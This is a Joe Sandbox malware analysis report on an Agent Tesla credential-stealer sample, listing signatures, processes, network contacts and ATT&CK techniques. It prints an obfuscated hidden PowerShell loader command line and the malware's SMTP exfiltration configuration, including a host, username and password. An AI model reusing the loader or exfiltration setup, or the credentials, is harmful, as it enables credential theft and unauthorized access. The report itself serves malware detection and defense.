Windows
Analysis Report
KWOTASIE.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
KWOTASIE.exe (PID: 6756 cmdline:
"C:\Users\ user\Deskt op\KWOTASI E.exe" MD5: ECBEC21DCFA39A1131D2A79ACDF73F88) powershell.exe (PID: 2888 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$S mitten=cat 'C:\Users \user\AppD ata\Local\ Innoxious\ Phantasies .ude';$Neb engeschfte ns=$Smitte n.substrin g(78762,3) ;.$Nebenge schftens($ Smitten)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 4292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wab.exe (PID: 5032 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab .exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | 0_2_0040595A | |
Source: | Code function: | 0_2_0040658F | |
Source: | Code function: | 0_2_00402862 |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 0_2_004053EF |
Source: | Code function: | 0_2_0040333D |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00406956 | |
Source: | Code function: | 0_2_00404C2C | |
Source: | Code function: | 6_2_00334AC8 | |
Source: | Code function: | 6_2_0033EC60 | |
Source: | Code function: | 6_2_0033AD20 | |
Source: | Code function: | 6_2_00333EB0 | |
Source: | Code function: | 6_2_003341F8 |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040333D |
Source: | Code function: | 0_2_004046B0 |
Source: | Code function: | 0_2_004020FE |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | HTTP traffic detected: |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | API/Special instruction interceptor: |
Source: | Binary or memory string: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Code function: | 0_2_0040595A | |
Source: | Code function: | 0_2_0040658F | |
Source: | Code function: | 0_2_00402862 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3850 |
Source: | Process information queried: | Jump to behavior |
Anti Debugging |
---|
Source: | Code function: | 6_2_003370A0 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 6_2_0033FB24 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_0040333D |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Software Packing | 1 Credentials in Registry | 136 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 111 Process Injection | 1 DLL Side-Loading | Security Account Manager | 631 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 261 Virtualization/Sandbox Evasion | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | 22 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs | |||
9% | Virustotal | Browse | ||
100% | Avira | HEUR/AGEN.1331786 |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
1% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false |
| unknown |
zakk.co.za | 102.218.215.35 | true | false |
| unknown |
ip-api.com | 208.95.112.1 | true | true |
| unknown |
mail.lumies.co.za | 102.130.125.173 | true | true |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true | |
102.218.215.35 | zakk.co.za | unknown | 36926 | CKL1-ASNKE | false | |
102.130.125.173 | mail.lumies.co.za | South Africa | 37153 | xneeloZA | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1465894 |
Start date and time: | 2024-07-02 08:12:45 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | KWOTASIE.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/11@3/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 20.242.39.171, 52.165.164.15
